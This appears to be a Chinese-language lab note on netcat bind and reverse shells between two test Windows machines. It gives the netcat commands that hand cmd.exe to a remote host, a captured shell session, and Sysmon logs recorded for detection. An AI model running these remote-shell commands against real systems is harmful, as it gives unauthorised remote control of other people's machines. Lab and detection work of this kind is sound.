nc远控反弹shell小实践
正向shell:
132机器A上:==>是c2的client
nc.exe -L -d -e cmd.exe -p 5555
134机器B上:
nc64.exe XXX.132 5555
然后就可以输入命令远控132机器了!
我的nc都放在了桌面,所以在桌面cmd即可!
反弹shell例子:
134主机A上,运行如下命令监听8888端口:
C:\Users\qiankun\Desktop>nc -n -lvvp 8888
listening on [any] 8888 ...
connect to [XXX] from (UNKNOWN) [XXX] 53960
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.
C:\Users\qiankun\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is C6C4-46F7
Directory of C:\Users\qiankun\Desktop
08/01/2022 01:23 AM <DIR> .
08/01/2022 01:23 AM <DIR> ..
05/11/2022 01:09 AM <DIR> 619f00628d0db414e782dbf0f3739eb6ceffd0036c6c83a17c31e3c2f6bdc266
05/11/2022 08:35 PM <DIR> 80ffaea12a5ffb502d6ce110e251024e7ac517025bf95daa49e6ea6ddd0c7d5b
05/16/2022 12:38 AM <DIR> aaabitsadmin.exe.ps1
05/16/2022 12:30 AM 616 aaabitsadmin.exe.ps1.zip
05/24/2022 12:13 AM 0 Add-ConstrainedDelegationBackdoor.ps1
05/30/2022 10:32 PM 104,857,751 Agent.log
05/23/2022 02:38 AM 3 agent.ps1
06/13/2022 02:14 AM 8,447,018 Agent_1.log
06/09/2022 11:48 PM <DIR> b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl
06/09/2022 11:37 PM 1,324,365 b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl.zip
04/26/2022 07:55 PM 208 bitsadmin.exe.ps1
08/04/2017 02:19 AM 75,418 COM Object hijacking persistence.ps1
04/21/2022 02:30 AM <DIR> dev
04/14/2022 11:22 PM 167 exit.bat
03/24/2022 08:41 AM 2,348 Microsoft Edge.lnk
04/19/2022 12:30 AM 24,896 msxsl.exe
07/31/2022 09:00 PM 38,616 nc.exe
07/31/2022 09:00 PM 45,272 nc64.exe
08/01/2022 01:14 AM 5,980,919 nc_miansha.exe
04/13/2022 11:23 PM 1,436,160 NeverLose.bin.exe
05/23/2022 02:37 AM 0 New Text Document.txt
05/23/2022 02:49 AM <DIR> nishang-master
05/23/2022 02:39 AM 80,249 nishang-master.zip
06/10/2022 12:42 AM <DIR> Office Tool
06/09/2022 11:54 PM 2,085,551,571 Office Tool.zip
05/18/2022 02:43 AM <DIR> phpStudy_64
05/17/2022 07:55 PM 81,485,042 phpStudy_64.zip
07/31/2022 10:04 PM <DIR> PSTools
07/31/2022 09:10 PM 4,089,627 PSTools.zip
05/23/2022 11:39 PM <DIR> QianKunEDR-Windows-x64-Setup
07/31/2022 07:11 PM <DIR> QianKunEDR-Windows-x64-Setup (5)
07/31/2022 06:51 PM 90,915,906 QianKunEDR-Windows-x64-Setup (5).zip
05/23/2022 11:28 PM 108,074,453 QianKunEDR-Windows-x64-Setup.zip
04/14/2022 11:22 PM 65 start.bat
05/06/2022 02:25 AM <DIR> Sysmon
05/06/2022 02:14 AM 3,263,064 Sysmon.zip
05/16/2022 02:44 AM <DIR> test
05/24/2022 02:10 AM 10,522 test.chm
07/31/2022 06:46 PM 3,607,096 winrarx64.610scp.exe
05/07/2022 12:53 AM <DIR> x64
04/14/2022 02:30 AM 1,892 XXX.sct
27 File(s) 2,499,313,244 bytes
16 Dir(s) 17,187,168,256 bytes free
C:\Users\qiankun\Desktop>whoami
whoami
desktop-gem2odd\qiankun
C:\Users\qiankun\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : XXX
IPv4 Address. . . . . . . . . . . : XXXX
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : XXX
132机器B上,运行如下命令,去主动连接A机器:
nc XXX.134IP 8888 -t -e cmd.exe
然后就可以在134机器A上控制机器B了。
数据采集和检测:
日期和时间 来源 事件 ID 任务类别
2022/11/15 17:42 Microsoft-Windows-Sysmon 18 Pipe Connected (rule: PipeEvent) "Pipe Connected:
RuleName: -
EventType: ConnectPipe
UtcTime: 2022-11-15 09:42:51.576
ProcessGuid: {95699A2E-0F5B-6373-0119-040000000C00}
ProcessId: 1908
PipeName: \lsass
Image: C:\Windows\system32\mmc.exe
User: dw-PC\dw"
2022/11/15 17:40 Microsoft-Windows-Sysmon 1 Process Create (rule: ProcessCreate) "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:31.750
ProcessGuid: {95699A2E-5E8F-6373-7519-040000000C00}
ProcessId: 3440
Image: C:\Windows\System32\whoami.exe
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
Description: whoami - displays logged on user information
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: whoami.exe
CommandLine: whoami
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=EC2231C0FEA6B821A5ED097419744205,SHA256=C36CF78F2257F606AB67B14AFB02DCA652A3FA6907C7805EFBD2D47241EE609A,IMPHASH=33138CA52B3F4A94BA90037F3DE01CB2
ParentProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
ParentProcessId: 5016
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe
ParentUser: dw-PC\dw"
2022/11/15 17:40 Microsoft-Windows-Sysmon 1 Process Create (rule: ProcessCreate) "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:20.362
ProcessGuid: {95699A2E-5E84-6373-7419-040000000C00}
ProcessId: 4808
Image: C:\Windows\System32\ipconfig.exe
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
Description: IP Configuration Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: ipconfig.exe
CommandLine: ipconfig
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=CF45949CDBB39C953331CDCB9CEC20F8,SHA256=34DF739526C114BB89470B3B650946CBF7335CB4A2206489534FB05C1FC143A8,IMPHASH=BBBA00511B8BEF70143B0EEBBB337273
ParentProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
ParentProcessId: 5016
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe
ParentUser: dw-PC\dw"
2022/11/15 17:40 Microsoft-Windows-Sysmon 3 Network connection detected (rule: NetworkConnect) "Network connection detected:
RuleName: Usermode
UtcTime: 2022-10-14 17:11:18.718
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 192.168.203.128
SourceHostname: dw-PC.localdomain
SourcePort: 49405
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.203.130
DestinationHostname: -
DestinationPort: 7777
DestinationPortName: -"
2022/11/15 17:40 Microsoft-Windows-Sysmon 1 Process Create (rule: ProcessCreate) "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
ProcessId: 5016
Image: C:\Windows\System32\cmd.exe
FileVersion: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: cmd.exe
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A
ParentProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ParentProcessId: 3876
ParentImage: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
ParentCommandLine: nc64.exe -e cmd.exe 192.168.203.130 7777
ParentUser: dw-PC\dw"
2022/11/15 17:40 Microsoft-Windows-Sysmon 18 Pipe Connected (rule: PipeEvent) "Pipe Connected:
RuleName: -
EventType: ConnectPipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
2022/11/15 17:40 Microsoft-Windows-Sysmon 17 Pipe Created (rule: PipeEvent) "Pipe Created:
RuleName: -
EventType: CreatePipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
2022/11/15 17:40 Microsoft-Windows-Sysmon 18 Pipe Connected (rule: PipeEvent) "Pipe Connected:
RuleName: -
EventType: ConnectPipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
2022/11/15 17:40 Microsoft-Windows-Sysmon 17 Pipe Created (rule: PipeEvent) "Pipe Created:
RuleName: -
EventType: CreatePipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
2022/11/15 17:40 Microsoft-Windows-Sysmon 1 Process Create (rule: ProcessCreate) "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
FileVersion: -
Description: -
Product: -
Company: -
OriginalFileName: -
CommandLine: nc64.exe -e cmd.exe 192.168.203.130 7777
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=523613A7B9DFA398CBD5EBD2DD0F4F38,SHA256=3E59379F585EBF0BECB6B4E06D0FBBF806DE28A4BB256E837B4555F1B4245571,IMPHASH=567531F08180AB3963B70889578118A3
ParentProcessGuid: {95699A2E-5924-6373-6B19-040000000C00}
ParentProcessId: 2680
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: ""C:\Windows\System32\cmd.exe""
ParentUser: dw-PC\dw"
